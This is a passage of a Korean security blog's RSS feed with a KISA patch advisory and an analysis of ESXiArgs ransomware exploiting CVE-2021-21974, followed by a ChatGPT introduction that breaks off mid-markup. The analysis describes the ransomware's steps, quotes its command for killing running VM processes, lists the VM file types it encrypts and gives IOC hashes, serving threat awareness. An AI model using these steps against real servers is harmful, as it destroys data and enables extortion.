#666666;&quot; href=&quot;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=66633&quot;&gt;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=66633&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[22]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35016&quot;&gt;https://boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35016&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666;&quot;&gt;[23]&amp;nbsp;&lt;a style=&quot;color: #666666;&quot; href=&quot;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29464&quot;&gt;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29464&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;</description>
      <category>Code::보안공지</category>
      <category>CVE</category>
      <category>KISA</category>
      <category>보안 업데이트</category>
      <category>보안공지</category>
      <category>취약점</category>
      <category>취약점 보안 업데이트</category>
      <category>해킹 공격</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/275</guid>
      <comments>https://securitycode.tistory.com/275#entry275comment</comments>
      <pubDate>Wed, 22 Feb 2023 10:56:18 +0900</pubDate>
    </item>
    <item>
      <title>VMware ESXi 서버를 노리는 대규모 랜섬웨어 공격</title>
      <link>https://securitycode.tistory.com/274</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;ESXi&amp;nbsp;Args&amp;nbsp;랜섬웨어&amp;nbsp;발발로&amp;nbsp;1,000대&amp;nbsp;이상의&amp;nbsp;서버에&amp;nbsp;영향&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;2월&amp;nbsp;3일,&amp;nbsp;CERT-FR&amp;nbsp;은&amp;nbsp;ESXi&amp;nbsp;Args&amp;nbsp;랜섬웨어를&amp;nbsp;배포하기&amp;nbsp;위해&amp;nbsp;VMware&amp;nbsp;ESXi&amp;nbsp;서버를&amp;nbsp;대상으로&amp;nbsp;하는&amp;nbsp;랜섬웨어&amp;nbsp;공격에&amp;nbsp;대해&amp;nbsp;사용자에게&amp;nbsp;경고&amp;nbsp;했습니다.&amp;nbsp;이&amp;nbsp;보고서는&amp;nbsp;또한&amp;nbsp;TA(Threat&amp;nbsp;Actors)가&amp;nbsp;CVE-2021-21974&amp;nbsp;로&amp;nbsp;추적된&amp;nbsp;2년&amp;nbsp;된&amp;nbsp;취약점을&amp;nbsp;활용한다고&amp;nbsp;밝혔&amp;nbsp;습니다.&amp;nbsp;VMware에&amp;nbsp;따르면&amp;nbsp;ESXi70U1c-17325551&amp;nbsp;이전의&amp;nbsp;ESXi&amp;nbsp;버전&amp;nbsp;7.0,&amp;nbsp;ESXi670-202102401-SG&amp;nbsp;이전의&amp;nbsp;6.7&amp;nbsp;및&amp;nbsp;ESXi650-202102101-SG&amp;nbsp;이전의&amp;nbsp;6.5에는&amp;nbsp;OpenSLP의&amp;nbsp;힙&amp;nbsp;오버플로우&amp;nbsp;취약점이&amp;nbsp;포함되어&amp;nbsp;있습니다.&amp;nbsp;포트&amp;nbsp;427에&amp;nbsp;액세스할&amp;nbsp;수&amp;nbsp;있는&amp;nbsp;ESXi&amp;nbsp;시스템과&amp;nbsp;동일한&amp;nbsp;네트워크에&amp;nbsp;있는&amp;nbsp;TA는&amp;nbsp;이&amp;nbsp;취약점을&amp;nbsp;악용하여&amp;nbsp;원격으로&amp;nbsp;코드를&amp;nbsp;실행할&amp;nbsp;수&amp;nbsp;있습니다. &lt;br /&gt;&lt;br /&gt;온라인&amp;nbsp;스캐너는&amp;nbsp;또한&amp;nbsp;랜섬웨어&amp;nbsp;감염이&amp;nbsp;널리&amp;nbsp;퍼져&amp;nbsp;있으며&amp;nbsp;전&amp;nbsp;세계적으로&amp;nbsp;1000개에&amp;nbsp;가까운&amp;nbsp;서버를&amp;nbsp;감염시켰음을&amp;nbsp;보여줍니다.&amp;nbsp;이&amp;nbsp;랜섬웨어는&amp;nbsp;아래와&amp;nbsp;같이&amp;nbsp;대부분&amp;nbsp;프랑스에&amp;nbsp;영향을&amp;nbsp;미쳤으며&amp;nbsp;미국과&amp;nbsp;독일이&amp;nbsp;그&amp;nbsp;뒤를&amp;nbsp;이었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;이&amp;nbsp;랜섬웨어&amp;nbsp;공격과&amp;nbsp;관련된&amp;nbsp;샘플에는&amp;nbsp;암호화를&amp;nbsp;담당하는&amp;nbsp;&quot;encrypt.sh&quot;&amp;nbsp;및&amp;nbsp;&quot;encrypt&quot;라는&amp;nbsp;두&amp;nbsp;개의&amp;nbsp;파일이&amp;nbsp;포함되어&amp;nbsp;있습니다.&amp;nbsp;&quot;encrypt.sh&quot;는&amp;nbsp;암호화&amp;nbsp;프로세스를&amp;nbsp;시작하기&amp;nbsp;전에&amp;nbsp;여러&amp;nbsp;작업을&amp;nbsp;수행하고&amp;nbsp;&quot;encrypt&quot;&amp;nbsp;ELF&amp;nbsp;실행&amp;nbsp;파일을&amp;nbsp;실행하여&amp;nbsp;파일을&amp;nbsp;암호화하는&amp;nbsp;쉘&amp;nbsp;스크립트입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;기술적 분석&lt;/b&gt;&lt;br /&gt;셸&amp;nbsp;스크립트는&amp;nbsp;구성&amp;nbsp;파일&amp;nbsp;수정,&amp;nbsp;파일&amp;nbsp;암호화,&amp;nbsp;랜섬웨어&amp;nbsp;메모에&amp;nbsp;대한&amp;nbsp;지속성&amp;nbsp;설정,&amp;nbsp;ESXi&amp;nbsp;서버에서&amp;nbsp;맬웨어&amp;nbsp;제거와&amp;nbsp;같은&amp;nbsp;다양한&amp;nbsp;작업을&amp;nbsp;수행합니다.&amp;nbsp;이&amp;nbsp;블로그는&amp;nbsp;셸&amp;nbsp;스크립트와&amp;nbsp;랜섬웨어&amp;nbsp;페이로드에&amp;nbsp;대한&amp;nbsp;기술적&amp;nbsp;통찰력을&amp;nbsp;제공합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;구성&amp;nbsp;파일&amp;nbsp;수정&lt;/b&gt; &lt;br /&gt;Shell 스크립트는 먼저 &quot; esxcli vm process list&quot; 명령 을 사용하여 ESXi 서버에서 실행 중인 가상 머신의 구성 파일을 식별하고 가상 디스크 및 스왑 파일에 대한 경로를 수정합니다. 악성코드는 '.vmdk'를 '1.vmdk'로, '.vswp'를 '1.vswp'로 교체합니다. 구성&amp;nbsp;파일에서&amp;nbsp;파일&amp;nbsp;이름을&amp;nbsp;변경하여&amp;nbsp;랜섬웨어는&amp;nbsp;피해자가&amp;nbsp;암호화&amp;nbsp;후&amp;nbsp;원본&amp;nbsp;데이터를&amp;nbsp;찾고&amp;nbsp;복원하기&amp;nbsp;어렵게&amp;nbsp;만듭니다.&amp;nbsp;구성&amp;nbsp;파일을&amp;nbsp;변경한&amp;nbsp;후&amp;nbsp;셸&amp;nbsp;스크립트는&amp;nbsp;&quot;&amp;nbsp;kill&amp;nbsp;-9&amp;nbsp;$(ps&amp;nbsp;|&amp;nbsp;grep&amp;nbsp;vmx&amp;nbsp;|&amp;nbsp;awk&amp;nbsp;'{print&amp;nbsp;$2}')&amp;nbsp;&quot;&amp;nbsp;명령을&amp;nbsp;사용하여&amp;nbsp;ESXi&amp;nbsp;서버에서&amp;nbsp;.VMX&amp;nbsp;파일을&amp;nbsp;종료합니다. &lt;br /&gt;&lt;br /&gt;&lt;b&gt;파일&amp;nbsp;암호화&lt;/b&gt; &lt;br /&gt;이제&amp;nbsp;악성&amp;nbsp;스크립트는&amp;nbsp;파일을&amp;nbsp;완전히&amp;nbsp;제어하여&amp;nbsp;암호화&amp;nbsp;프로세스를&amp;nbsp;시작합니다.&amp;nbsp;첫째,&amp;nbsp;ESXi&amp;nbsp;서버에&amp;nbsp;있는&amp;nbsp;볼륨을&amp;nbsp;반복하고&amp;nbsp;&quot;.vmdk&quot;,&amp;nbsp;&quot;.vmx&quot;,&amp;nbsp;&quot;.vmxf&quot;,&amp;nbsp;&quot;.vmsd&quot;,&amp;nbsp;&quot;.vmsn&quot;,&amp;nbsp;&quot;.vswp&quot;를&amp;nbsp;포함한&amp;nbsp;특정&amp;nbsp;확장자를&amp;nbsp;가진&amp;nbsp;파일을&amp;nbsp;검색합니다&amp;nbsp;.&amp;nbsp;,&amp;nbsp;&quot;.vmss&quot;,&amp;nbsp;&quot;.nvram&quot;&amp;nbsp;및&amp;nbsp;&quot;.vmem&quot;&amp;nbsp;이&amp;nbsp;발견된&amp;nbsp;볼륨에&amp;nbsp;있습니다. &lt;br /&gt;&lt;br /&gt;그런&amp;nbsp;다음&amp;nbsp;스크립트는&amp;nbsp;파일&amp;nbsp;크기를&amp;nbsp;계산하고&amp;nbsp;인수&amp;nbsp;파일&amp;nbsp;&quot;&amp;nbsp;public.pem&amp;nbsp;&quot;과&amp;nbsp;함께&amp;nbsp;Linux&amp;nbsp;바이너리&amp;nbsp;실행&amp;nbsp;파일&amp;nbsp;&quot;encrypt&quot;를&amp;nbsp;사용하여&amp;nbsp;파일을&amp;nbsp;암호화합니다&amp;nbsp;.&amp;nbsp;&amp;ldquo;&amp;nbsp;public.pem&amp;nbsp;&amp;rdquo;&amp;nbsp;파일은&amp;nbsp;랜섬웨어가&amp;nbsp;파일&amp;nbsp;암호화에&amp;nbsp;사용할&amp;nbsp;키를&amp;nbsp;암호화하는&amp;nbsp;데&amp;nbsp;사용하는&amp;nbsp;RSA&amp;nbsp;공개&amp;nbsp;키입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;침해&amp;nbsp;지표(IOC)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000;&quot;&gt;10c3b6b03a9bf105d264a8e7f30dcab0a6c59a414529b0af0a6bd9f1d2984459&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000;&quot;&gt;11b1b2375d9d840912cfd1f0d0d04d93ed0cddb0ae4ddb550a5b62cd044d6b66&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;color: #000000;&quot;&gt;&lt;span style=&quot;background-color: #ffffff;&quot;&gt;참조&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #000000;&quot;&gt;&lt;span style=&quot;background-color: #ffffff;&quot;&gt;&lt;a href=&quot;https://blog.cyble.com/2023/02/06/massive-ransomware-attack-targets-vmware-esxi-servers/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://blog.cyble.com/2023/02/06/massive-ransomware-attack-targets-vmware-esxi-servers/&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;</description>
      <category>Code::보안이슈</category>
      <category>CVE-2021-21974</category>
      <category>vmware esxi</category>
      <category>VMware ESXi 취약점</category>
      <category>랜섬웨어</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/274</guid>
      <comments>https://securitycode.tistory.com/274#entry274comment</comments>
      <pubDate>Fri, 10 Feb 2023 14:48:50 +0900</pubDate>
    </item>
    <item>
      <title>보안공지 : 랜섬웨어를 유포하는 VMware ESXi 취약점 주의 권고</title>
      <link>https://securitycode.tistory.com/273</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;□&amp;nbsp;개요 &lt;br /&gt;&amp;nbsp;o&amp;nbsp;최근&amp;nbsp;VMware&amp;nbsp;ESXi&amp;nbsp;취약점을&amp;nbsp;이용하여&amp;nbsp;랜섬웨어가&amp;nbsp;유포되고&amp;nbsp;있으므로&amp;nbsp;기업&amp;nbsp;담당자들의&amp;nbsp;철저한&amp;nbsp;사전&amp;nbsp;보안&amp;nbsp;점검&amp;nbsp;및&amp;nbsp;대비&amp;nbsp;필요[1] &lt;br /&gt;&amp;nbsp;o&amp;nbsp;취약한&amp;nbsp;버전을&amp;nbsp;사용하는&amp;nbsp;VMware&amp;nbsp;ESXi&amp;nbsp;제품&amp;nbsp;사용자는&amp;nbsp;최신버전으로&amp;nbsp;업데이트&amp;nbsp;권고 &lt;br /&gt;&lt;br /&gt;□&amp;nbsp;설명 &lt;br /&gt;&amp;nbsp;o&amp;nbsp;VMware&amp;nbsp;ESXi의&amp;nbsp;OpenSLP에서&amp;nbsp;발생하는&amp;nbsp;원격코드실행&amp;nbsp;취약점(CVE-2021-21974)&amp;nbsp;[2]&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;802&quot; data-origin-height=&quot;181&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/xLGHE/btrYKvIFMB0/WaPk3bAdGkEekGgnR5oStK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/xLGHE/btrYKvIFMB0/WaPk3bAdGkEekGgnR5oStK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/xLGHE/btrYKvIFMB0/WaPk3bAdGkEekGgnR5oStK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FxLGHE%2FbtrYKvIFMB0%2FWaPk3bAdGkEekGgnR5oStK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;802&quot; height=&quot;181&quot; data-origin-width=&quot;802&quot; data-origin-height=&quot;181&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;□&amp;nbsp;해결&amp;nbsp;방안 &lt;br /&gt;&amp;nbsp;o&amp;nbsp;참고사이트[2]에&amp;nbsp;명시되어&amp;nbsp;있는&amp;nbsp;&amp;lsquo;Reference&amp;rsquo;&amp;nbsp;내용을&amp;nbsp;참고하여&amp;nbsp;패치&amp;nbsp;적용 &lt;br /&gt;&amp;nbsp;o&amp;nbsp;업데이트&amp;nbsp;즉시&amp;nbsp;적용이&amp;nbsp;어려운&amp;nbsp;제품&amp;nbsp;사용자는&amp;nbsp;참고사이트[3]를&amp;nbsp;확인하여&amp;nbsp;취약한&amp;nbsp;SLP&amp;nbsp;서비스에&amp;nbsp;대해&amp;nbsp;사용하지&amp;nbsp;않도록&amp;nbsp;설정 &lt;br /&gt;&lt;br /&gt;□&amp;nbsp;기타&amp;nbsp;문의사항 &lt;br /&gt;&amp;nbsp;o&amp;nbsp;한국인터넷진흥원&amp;nbsp;사이버민원센터:&amp;nbsp;국번없이&amp;nbsp;118 &lt;br /&gt;&lt;br /&gt;[참고사이트] &lt;br /&gt;[1]&amp;nbsp;&lt;a href=&quot;https://www.cert.ssi.gouv.fr/alerte/CERTFR-2023-ALE-015/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://www.cert.ssi.gouv.fr/alerte/CERTFR-2023-ALE-015/&lt;/a&gt; &lt;br /&gt;[2]&amp;nbsp;&lt;a href=&quot;https://www.vmware.com/security/advisories/VMSA-2021-0002.html&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://www.vmware.com/security/advisories/VMSA-2021-0002.html&lt;/a&gt; &lt;br /&gt;[3]&amp;nbsp;&lt;a href=&quot;https://kb.vmware.com/s/article/76372&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://kb.vmware.com/s/article/76372&lt;/a&gt;&lt;/p&gt;</description>
      <category>Code::보안공지</category>
      <category>KISA</category>
      <category>vmware esxi</category>
      <category>VMware ESXi 취약점</category>
      <category>보안권고문</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/273</guid>
      <comments>https://securitycode.tistory.com/273#entry273comment</comments>
      <pubDate>Fri, 10 Feb 2023 14:40:01 +0900</pubDate>
    </item>
    <item>
      <title>챗 GPT (Chat GPT)</title>
      <link>https://securitycode.tistory.com/272</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;아마 IT를 하시는 분들 이나 관심이 있으신 분들은 이미 Chat GPT에 대해서 알고 계셨을지 모르지만, 아직 Chat GPT에 대해서 모르시는 분들을 위해 간단하게 소개를 하도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;ChatGPT는 OpenAI가 개발한 대화형 인공지능 챗봇 입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;GPT의&amp;nbsp;원리는&amp;nbsp;언어의&amp;nbsp;구조와&amp;nbsp;패턴을&amp;nbsp;포착할&amp;nbsp;수&amp;nbsp;있는&amp;nbsp;강력한&amp;nbsp;아키텍처와&amp;nbsp;대량의&amp;nbsp;사전&amp;nbsp;학습&amp;nbsp;데이터를&amp;nbsp;활용하여&amp;nbsp;인간과&amp;nbsp;유사한&amp;nbsp;텍스트를&amp;nbsp;생성하는&amp;nbsp;딥&amp;nbsp;러닝&amp;nbsp;기술을&amp;nbsp;사용하는&amp;nbsp;것입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;ChatGPT는&lt;span&gt;&amp;nbsp;&lt;/span&gt;프롬프트를 통하여 질문을 하면 그에 대한 답을 해줍니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;OpenAI에서 개발한 언어 모델인 ChatGPT는 다음을 포함하되 이에 국한되지 않는 여러 언어 관련 작업을 수행할 수 있습니다.&lt;/p&gt;
&lt;ol style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;텍스트 기반 대화: ChatGPT는 훈련 데이터를 기반으로 사용자와 대화하고 질문에 최대한 답변하도록 설계되었습니다.&lt;/li&gt;
&lt;li&gt;텍스트 완성: ChatGPT는 주어진 텍스트 프롬프트의 가장 가능성 있는 연속을 예측하여 문장, 단락 또는 전체 이야기를 완성할 수 있습니다.&lt;/li&gt;
&lt;li&gt;텍스트 요약: ChatGPT는 가장 중요한 정보를 유지하면서 긴 텍스트를 더 짧고 간결한 버전으로 요약할 수 있습니다.&lt;/li&gt;
&lt;li&gt;질문 답변: ChatGPT는 방대한 양의 텍스트에 대한 교육을 받았으며 역사, 과학, 시사 등 다양한 주제에 대한 질문에 답할 수 있습니다.&lt;/li&gt;
&lt;li&gt;텍스트 분류: ChatGPT는 텍스트를 내용에 따라 사전 정의된 범주 또는 클래스로 분류할 수 있습니다.&lt;/li&gt;
&lt;li&gt;텍스트 생성: ChatGPT는 시, 소설 또는 코딩과 같은 새로운 텍스트를 처음부터 생성할 수 있습니다.&lt;/li&gt;
&lt;li&gt;번역: ChatGPT는 텍스트를 한 언어에서 다른 언어로 번역할 수 있습니다.&lt;/li&gt;
&lt;/ol&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;ChatGPT는 완벽하지 않으며 때때로 답변이 부정확하거나 불완전할 수 있습니다. 그럼에도 불구하고 다양한 주제에 대해 교육을 받았으며 많은 주제에 대한 유용한 정보와 통찰력을 제공할 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;a href=&quot;https://openai.com/blog/chatgpt/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://openai.com/blog/chatgpt/&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1676006191444&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;ChatGPT: Optimizing Language Models for Dialogue&quot; data-og-description=&quot;We&amp;rsquo;ve trained a model called ChatGPT which interacts in a conversational way. The dialogue format makes it possible for ChatGPT to answer followup questions, admit its mistakes, challenge incorrect premises, and reject inappropriate requests. ChatGPT is &quot; data-og-host=&quot;openai.com&quot; data-og-source-url=&quot;https://openai.com/blog/chatgpt/&quot; data-og-url=&quot;https://openai.com/blog/chatgpt/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/cOr6Hm/hyRzw6S8Ke/YUPKWEbagNfZrsL5nANtSK/img.jpg?width=2047&amp;amp;height=2047&amp;amp;face=0_0_2047_2047,https://scrap.kakaocdn.net/dn/dFURnA/hyRzwFMqus/TeExKNx0xTRhUPMtfZUJfK/img.jpg?width=2047&amp;amp;height=2047&amp;amp;face=0_0_2047_2047&quot;&gt;&lt;a href=&quot;https://openai.com/blog/chatgpt/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://openai.com/blog/chatgpt/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/cOr6Hm/hyRzw6S8Ke/YUPKWEbagNfZrsL5nANtSK/img.jpg?width=2047&amp;amp;height=2047&amp;amp;face=0_0_2047_2047,https://scrap.kakaocdn.net/dn/dFURnA/hyRzwFMqus/TeExKNx0xTRhUPMtfZUJfK/img.jpg?width=2047&amp;amp;height=2047&amp;amp;face=0_0_2047_2047');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;ChatGPT: Optimizing Language Models for Dialogue&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;We&amp;rsquo;ve trained a model called ChatGPT which interacts in a conversational way. The dialogue format makes it possible for ChatGPT to answer followup questions, admit its mistakes, challenge incorrect premises, and reject inappropriate requests. ChatGPT is&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;openai.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1220&quot; data-origin-height=&quot;768&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/c3MSDq/btrYMOnheVg/xNKIQlVt98vbhPJGAFMEu0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/c3MSDq/btrYMOnheVg/xNKIQlVt98vbhPJGAFMEu0/img.png&quot; data-alt=&quot;https://openai.com/blog/chatgpt/&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/c3MSDq/btrYMOnheVg/xNKIQlVt98vbhPJGAFMEu0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc3MSDq%2FbtrYMOnheVg%2FxNKIQlVt98vbhPJGAFMEu0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;472&quot; data-origin-width=&quot;1220&quot; data-origin-height=&quot;768&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;https://openai.com/blog/chatgpt/&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;해당 사이트에 접속후 &quot;TRY CHATGPT&quot;를 눌러 회원 가입후 로그인을 해줍니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1203&quot; data-origin-height=&quot;863&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/78Mfk/btrYRQD6m6s/I4ui02S3PkWKRqcinLCF3K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/78Mfk/btrYRQD6m6s/I4ui02S3PkWKRqcinLCF3K/img.png&quot; data-alt=&quot;로그인 화면&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/78Mfk/btrYRQD6m6s/I4ui02S3PkWKRqcinLCF3K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F78Mfk%2FbtrYRQD6m6s%2FI4ui02S3PkWKRqcinLCF3K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;538&quot; data-origin-width=&quot;1203&quot; data-origin-height=&quot;863&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;로그인 화면&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;회원 가입후 로그인을 하면 위처럼 보이는데, 빨간색 네모친 프롬프트안에 본인이 원하는 질문을 넣어 줍니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1265&quot; data-origin-height=&quot;869&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/mIIOr/btrYRuOPoZT/qKrp7RkyxvIua4rVVA6euK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/mIIOr/btrYRuOPoZT/qKrp7RkyxvIua4rVVA6euK/img.png&quot; data-alt=&quot;SQL Injection 취약점과 그에 대한 대응 방안을 질의&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/mIIOr/btrYRuOPoZT/qKrp7RkyxvIua4rVVA6euK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FmIIOr%2FbtrYRuOPoZT%2FqKrp7RkyxvIua4rVVA6euK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;515&quot; data-origin-width=&quot;1265&quot; data-origin-height=&quot;869&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;SQL Injection 취약점과 그에 대한 대응 방안을 질의&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;SQL Injection 취약점과 대응 방법에 대해 질의를 했더니 위처럼 Chat GPT를 통하여 답변을 받을수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;807&quot; data-origin-height=&quot;715&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/DOHBb/btrYRkTgPlb/KNdfzKCtclYFKgqWExhLkk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/DOHBb/btrYRkTgPlb/KNdfzKCtclYFKgqWExhLkk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/DOHBb/btrYRkTgPlb/KNdfzKCtclYFKgqWExhLkk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FDOHBb%2FbtrYRkTgPlb%2FKNdfzKCtclYFKgqWExhLkk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;664&quot; 